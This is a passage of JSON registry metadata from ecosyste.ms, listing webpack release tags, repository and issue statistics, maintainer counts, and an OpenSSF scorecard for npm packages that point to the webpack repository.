ck/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T15:50:01.241Z","dependent_packages_count":0,"downloads":11,"downloads_period":"last-month","dependent_repos_count":2,"rankings":{"downloads":54.90282062971637,"dependent_repos_count":7.611275902025924,"dependent_packages_count":51.836728746128266,"stargazers_count":0.07834503466984864,"forks_count":0.39276155743318475,"docker_downloads_count":null,"average":22.96438637399472},"purl":"pkg:npm/webpack-universal","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-universal","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-universal","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-universal/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T17:00:12.153Z","issues_count":10162,"pull_requests_count":9386,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2758812.4810541794,"issues_closed_count":9895,"pull_requests_closed_count":8841,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834382995473332,"avg_comments_per_pull_request":3.1543788621350948,"merged_pull_requests_count":5983,"bot_issues_count":8,"bot_pull_requests_count":2907,"past_year_issues_count":80,"past_year_pull_requests_count":896,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":359731.32045779686,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":699,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.3625,"past_year_avg_comments_per_pull_request":4.657366071428571,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":136,"past_year_merged_pull_requests_count":550,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1051,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":122,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":411,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":81,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-universal/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-universal/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-universal/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-universal/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-universal/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpack-universal/codemeta","maintainers":[{"uuid":"faceyspacey","login":"faceyspacey","name":null,"email":"james@faceyspacey.com","url":null,"packages_count":38,"html_url":"https://www.npmjs.com/~faceyspacey","role":null,"created_at":"2022-11-15T10:40:40.377Z","updated_at":"2022-11-15T10:40:40.377Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/faceyspacey/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":5328785,"name":"webpack-vscode-wasm","ecosystem":"npm","description":"Packs CommonJs/AMD modules for the browser. Allows to split your codebase into multiple bundles, which can be loaded on demand. Support loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2022-10-14T11:24:53.199Z","latest_release_published_at":"2022-10-14T11:24:53.199Z","latest_release_number":"5.74.0","last_synced_at":"2026-09-03T00:29:42.125Z","created_at":"2022-10-16T00:51:37.404Z","updated_at":"2026-09-03T00:29:42.126Z","registry_url":"https://www.npmjs.com/package/webpack-vscode-wasm","install_command":"npm install webpack-vscode-wasm","documentation_url":null,"metadata":{"funding":{"type":"opencollective","url":"https://opencollective.com/webpack"},"dist-tags":{"latest":"5.74.0"},"contentPolicy":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection 